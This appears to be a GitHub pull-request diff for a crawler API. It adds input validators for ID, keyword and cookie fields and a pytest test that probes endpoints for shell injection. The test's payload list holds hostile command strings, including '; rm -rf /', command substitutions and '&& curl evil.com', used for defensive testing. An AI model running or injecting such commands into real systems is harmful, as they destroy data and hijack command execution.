Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
17 changes: 16 additions & 1 deletion api/schemas/crawler.py
Original file line number Diff line number Diff line change
Expand Up @@ -16,9 +16,10 @@
# 详细许可条款请参阅项目根目录下的LICENSE文件。
# 使用本代码即表示您同意遵守上述原则和LICENSE中的所有条款。

import re
from enum import Enum
from typing import Optional, Literal
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, field_validator


# Upper bound (inclusive) applied via ``le=`` to the optional
# ``max_notes_count`` / ``max_comments_count`` request fields.
MAX_API_LIMIT_COUNT = 10000
Expand Down Expand Up @@ -74,6 +75,20 @@ class CrawlerStartRequest(BaseModel):
save_option: SaveDataOptionEnum = SaveDataOptionEnum.JSONL
cookies: str = ""
headless: bool = False

@field_validator("specified_ids", "creator_ids")
@classmethod
def validate_ids(cls, v: str) -> str:
    """Ensure an ID list uses only the permitted character set.

    Falsy values (e.g. the empty string) are returned unchanged. Any other
    value must consist entirely of ASCII letters, digits, underscores,
    commas, hyphens, or spaces.

    Args:
        v: Raw field value to check.

    Returns:
        ``v`` unchanged when it is acceptable.

    Raises:
        ValueError: If ``v`` contains a character outside the permitted set.
    """
    # Nothing to validate for an empty / missing value.
    if not v:
        return v

    permitted = re.compile(r"[A-Za-z0-9_,\- ]*")
    # fullmatch: the *whole* string must be made of permitted characters.
    if permitted.fullmatch(v) is None:
        raise ValueError("IDs must only contain alphanumeric characters, commas, hyphens, underscores, or spaces")
    return v

@field_validator("keywords", "cookies")
@classmethod
def validate_no_control_chars(cls, v: str) -> str:
    """Reject values containing a NUL byte, line feed, or carriage return.

    Falsy values (e.g. the empty string) are returned unchanged.

    Args:
        v: Raw field value to check.

    Returns:
        ``v`` unchanged when none of the forbidden characters are present.

    Raises:
        ValueError: If ``v`` contains ``\\x00``, ``\\n``, or ``\\r``.
    """
    # Short-circuits on falsy input so the regex only ever sees real text.
    has_forbidden_char = bool(v) and re.search(r"[\x00\n\r]", v) is not None
    if has_forbidden_char:
        raise ValueError("Field must not contain null bytes or newline characters")
    return v
max_notes_count: Optional[int] = Field(default=None, ge=1, le=MAX_API_LIMIT_COUNT)
max_comments_count: Optional[int] = Field(default=None, ge=1, le=MAX_API_LIMIT_COUNT)

Expand Down
70 changes: 70 additions & 0 deletions tests/test_invariant_main.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,70 @@
import pytest
from unittest.mock import patch, MagicMock
import subprocess


# Inputs fed to the API by the parametrized shell-injection invariant test.
PAYLOADS = [
"; rm -rf /",  # command chaining with ';'
"$(whoami)",  # $(...) command substitution
"`id`",  # backtick command substitution
"platform&& curl evil.com",  # '&&' chaining appended to a plausible value
"valid_platform",  # contains no shell metacharacters; benign control case
]


@pytest.mark.parametrize("payload", PAYLOADS)
def test_shell_commands_never_include_unsanitized_input(payload):
    """Invariant: Shell commands never include unsanitized user input.

    ``subprocess.run`` and ``subprocess.Popen`` are replaced with recording
    stubs, ``payload`` is sent to several candidate endpoints, and every
    recorded command is then checked to make sure the raw payload did not
    reach it.

    The test is skipped (instead of passing vacuously) when the application
    or its test client cannot be loaded. Individual requests stay
    best-effort: a request that raises does not stop the remaining probes.
    """
    captured_calls = []

    def mock_run(*args, **kwargs):
        captured_calls.append(("run", args, kwargs))
        return MagicMock(returncode=0)

    def mock_popen(*args, **kwargs):
        captured_calls.append(("popen", args, kwargs))
        mock_proc = MagicMock()
        mock_proc.returncode = 0
        mock_proc.communicate.return_value = (b"", b"")
        mock_proc.poll.return_value = 0
        return mock_proc

    # Various endpoints that might accept platform/config input:
    # (client method name, URL, extra keyword arguments).
    probes = [
        ("post", "/crawl", {"json": {"platform": payload}}),
        ("post", "/api/crawl", {"json": {"platform": payload}}),
        ("get", f"/crawl/{payload}", {}),
        ("post", "/start", {"json": {"platform": payload, "config": payload}}),
    ]

    with patch("subprocess.run", side_effect=mock_run), \
            patch("subprocess.Popen", side_effect=mock_popen):
        # Import while the patches are active so the app is loaded against
        # the recording stubs.
        try:
            from api.main import app
            from fastapi.testclient import TestClient
            client = TestClient(app)
        except Exception as exc:
            # Without the app nothing can be exercised; report that as a
            # skip rather than a misleading pass.
            pytest.skip(f"API application could not be loaded: {exc!r}")

        for method, url, request_kwargs in probes:
            try:
                getattr(client, method)(url, **request_kwargs)
            except Exception:
                # Deliberate best-effort: the endpoint may not exist or may
                # fail for unrelated reasons. Only the recorded subprocess
                # calls matter here, so move on to the next probe.
                continue

    shell_metacharacters = [";", "&&", "||", "`", "$(", "|", ">", "<"]
    # Payloads without any shell metacharacter (the benign control case)
    # carry no injection risk, so there is nothing to assert for them.
    if not any(meta in payload for meta in shell_metacharacters):
        return

    for call_type, args, kwargs in captured_calls:
        # The command may be given positionally or through ``args=``.
        cmd = args[0] if args else kwargs.get("args", "")

        if isinstance(cmd, str):
            # A string command is only interpreted by a shell when
            # shell=True, so that is the case that must stay payload-free.
            if kwargs.get("shell", False):
                assert payload not in cmd, (
                    f"Unsanitized payload '{payload}' found in shell command "
                    f"({call_type}): {cmd}"
                )
        elif isinstance(cmd, (list, tuple)):
            # For argument lists, verify the raw payload does not appear
            # anywhere in the joined command.
            joined = " ".join(str(part) for part in cmd)
            assert payload not in joined, (
                f"Unsanitized payload '{payload}' found in command args "
                f"({call_type}): {cmd}"
            )